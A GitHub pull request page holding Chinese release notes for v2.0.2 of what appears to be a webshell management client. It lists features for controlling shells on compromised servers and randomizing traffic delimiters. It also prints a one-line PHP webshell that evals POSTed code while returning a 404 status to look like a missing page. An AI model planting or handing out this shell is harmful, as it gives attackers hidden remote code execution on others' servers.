Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Release v2.0.2 #104

Merged
merged 28 commits into from
Dec 5, 2018
Merged

Release v2.0.2 #104

merged 28 commits into from
Dec 5, 2018

Conversation

Medicean
Copy link
Collaborator

@Medicean Medicean commented Dec 5, 2018

模块增强

Shell 管理

  • 可在 Shell 编辑数据窗口下的其它设置栏目下自定义上传文件分片大小 (默认为 500KB, 太大会导致 HTTP 413 错误)

文件管理

  • PHP Shell 下可直接修改文件权限, 显示为4位 8进制数, 如 0644

数据管理

  • 优化了查询结果显示,默认所有列宽为 100
  • 可将查询结果导出为 CSV 文件
  • PHP Shell MySQL 数据库可视化增强,支持新建数据库,删除数据库,新建表,修改表名,删除表,编辑列名,删除列

虚拟终端

  • 虚拟终端界面下使用 Ctrl + =(和+在一起的那个键) 可放大, Ctrl + - 可缩小

浏览网站

  • 新增了地址栏, 面对需要先进入登录页面的 Shell, 可先在此处访问 login 页面,然后保存 Cookie 到 Shell 配置。 默认为 Shell 的 URL
  • 调整了工具栏按钮的排列
  • 关闭了默认自动打开 URL,需要手动点击「浏览」按钮

Bug Fix

  • 修正 windows 客户端下用户编码器路径解析错误的问题

Other

  • 数据分割符随机化,再也不是之前固定的 ->||<-
  • 支持返回状态为 404, 500, 403 等非 200 的 Shell (support 404 status #103 thx @Curz0n),一个简单的例子如下:
  <?php http_response_code(404);@eval($_POST['ant']);?>
  • JSP Shell 基础信息调整, 现在默认的目录为 shell 编译后的 class 文件所在目录
  • 关于页面新增 Discord 在线交流地址

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

1 participant